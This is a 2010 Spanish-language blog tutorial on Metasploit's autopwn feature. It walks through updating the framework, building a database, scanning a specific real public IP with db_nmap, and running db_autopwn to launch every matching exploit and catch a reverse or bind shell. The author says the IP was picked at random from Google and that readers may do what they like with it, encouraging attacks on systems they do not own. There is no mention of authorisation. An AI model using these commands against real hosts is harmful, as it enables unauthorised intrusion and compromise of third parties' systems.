jueves, 6 de mayo de 2010

Metasploit Framework !!! Auto Shell =) Autopwn

Metasploit Framework !!! Auto Shell =)



Buenas a todos los parceros =)

Bueno alguno de ustedes puede que ya conozcan el framework de metasploit y para los que no conozcan esta tool, les explicare =)

El framework de metasploit es una suite de exploits y de herramientas de seguridad informatica, es una suite perfecta para las pruebas de pentest y para juackear un rato xD


Bueno vamos a comenzar !!!

Una vez instalado el framework en el equipo vamos a realizar una actualizacion al framework. Para realizar eso utilizaremos el comando msfupdate.


Una vez muestre la revision, significa que ya esta actualizado completamente =)

Ahora entraremos en la consola de comandos del metasploit ejecutando msfconsole.


Una vez adentro vamos a activar el plugin de sqlite el cual nos permitira crear la base de datos para realizar un autoataque ;) asi que para hacer eso escribiremos: db_driver sqlite3


Listo =)

Una vez cargado el driver vamos a crear una base de datos para que se guarde toda la info, para ello ejecutaremos: db_create hack1


hack1 lo pueden cambiar por cualquier otro nombre...Listo !! =p

Creada la base de datos procedemos a realizar el scanneo con nmap y a guardarlo en la base de datos =) para eso ejecutamos: db_nmap -sS -sV -PN 67.228.192.227


recuerden 67.228.192.227 se cambia por la ip que quieren scannear, esta ip es escogida al azar de google asi q pueden hacer lo q quieran con ella xD

Bueno una vez scanneado el host, el resultado se guarda automaticamente en la base de datos creada anteriormente. Ahora vamos a coger los exploits de cada puerto y los vamos a probar todos =) aunque eso no lo hacemos nosotros se hara automaticamente con la opcion db_autopwn y cuando salga la shell simplemente nos dara el acceso. Bonito cierto ?? =)

Bueno para hacer eso ejecutaremos: db_autopwn -p -e -t -s -r -b

Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output

-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex

Ya con esto solo nos queda esperar la shell =) Facilito cierto ?? jeje

Gracias a los de metasploit por esta gran tool y espero les guste el tuto =)

Atentamente,

Checho
Project-Ric Staff
HackBeerWii Event

No hay comentarios:

Publicar un comentario